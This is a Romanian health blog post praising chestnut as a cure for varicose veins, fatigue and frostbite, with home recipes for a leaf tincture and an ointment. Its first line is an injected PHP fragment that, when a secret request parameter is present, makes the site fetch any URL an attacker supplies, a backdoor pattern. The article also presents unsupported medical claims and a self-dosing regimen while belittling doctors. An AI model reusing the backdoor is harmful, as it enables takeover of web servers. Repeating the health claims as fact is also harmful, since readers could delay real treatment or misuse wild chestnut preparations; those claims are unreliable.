isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Castanul - MedicAS

castana in iarbaCu tot delirul la care suntem supusi odata cu lunile de toamna, inceperea gradinitei, scolilor, facultatilor, intoarcerea din concediu reluam viteza melcului turbat. Ca si cum nu ar fi de ajuns se trezeste si Toamna sa ne cadoriseasca cu temperaturi scazute, lumina la ratie, ploi, vant, astenii; este alt anotimp mai solicitant?

Daca pana acum ne incarcam bateriile de la soare, ne bine dispuneam doar privind pe fereastra, acum lumea pare o pivnita si soarele un sarac; asadar ce e de facut? Lasi la o parte povestile triste, iubirile de o vara adaugate si ele acum in bocceluta cu relatii si dezamagiri amare si te apuci sa anticipezi, urmatorul an.

Ai sperante, asteptari, planuri, obiective de atins pana vara viitoare, insa, ai uitat, nu ai combustibil. Prin oferta variata a Toamnei se ascunde un fruct, un arbore mai neglijat de comercianti si anume castanul.

Apreciat pana si de populatia chineza unde simboliza “prevederea”, castanul creste in livezi, la marginea padurilor, uneori si pe langa sosele, oriunde nu i-au luat locul cutiile de beton fara chip. I se mai spune si tonic general, actionand in favoarea sistemului muscular, nervos si venos. Totodata in perioada de convalescenta castanul “urmareste” asteniile psihice sau fizice, ajutand la eliberarea de serotonina (hormonul fericirii), desi de pe multe blocuri pancartele striga in urma noastra cu diverse tratamente pentru diverse afectiuni, si toti medicii anunta pe tonuri samanice ca varicele trebuie scoase prin incizii, stranse de git, trantite de pamant, fara nici o parere de rau pentru banii dati ca doar frumusetea costa, nu-i asa …

Nu stiu cum sunt altii, dar mie nu imi place sa fiu intepata, poate pentru oameni ca mine a crescut castanul. Cand venele vor incepe sa se dilate, vorbim acum de inceputul varicelor, sper sa cautati si voi acest remediu complex si eficient numit: castan.

In prevenirea, dar si in ameliorarea varicelor se pot folosi atat decoctul, cat si tincturile. Castanul e dupa cum bine stiti comestibil si salbatic; ambele pot fi utilizate in tratarea aproximativ a acelorasi afectiuni. Cu o paleta mai bogat fiind cel salbatic, insa acesta nu se poate transforma intr-un piure placut.

Castanii nu vin doar in ajutorul fricosilor de ace, ci si intru ajutorarea soferilor, a vanatorilor, impreuna cu alpinistii; ei sunt oameni supusi riscului de a le degera extremitatile - maini, picioare. O sa ma intrebati de ce soferilor? Pai la drumurile noastre ce se blocheaza dupa prima ninsoare, statul in trafic, asteptarea utilajelor de dezapezire, chiar si politistii ar trebui sa umble cu un cazan in care au fiert castane, ar fi o solutie sa isi spele astfel onoarea patata de deciziile mereu amanate ale guvernantilor.

Mod de folosire: o tinctura se obtine din 200g frunze maruntite la care un litru de alcool alimentar de 70 grade il transforma intr-un lichid ce se bea doar 10 picaturi pe zi diluate in 100ml apa.

Pentru unguent de ia 25 ml tinctura se amesteca cu 75g untura proaspata fara sare, se maseaza zona cu varice, eventual se infasoara piciorul in timpul somnului.

E de acum inainte nu o sa mai poti merge la medic scuzandu-te ca nu ai avut ce sa faci pentru impiedicare aparitiei varicelor, ori ca nu ai avut bani; singura scuza plauzibila e ca ai fost prea comoda pentru cautarea mamei natura si a castanelor ei deloc costisitoare. La cat de repede se misca totul in jur, e posibil sa nu treaca mult timp, iar tu, cea care acum te uiti la fotografii cu picioare varicoase, sa devii personajul principal daca nu constientizezi ca fotosinteza nu e unicul rol al castanului, ci si vindecarea ta.

Diana Fenici


Cuvinte relevante:


Articole asemănătoare:


Adaugă un comentariu


 
 

Newsletter

Loading... Loading...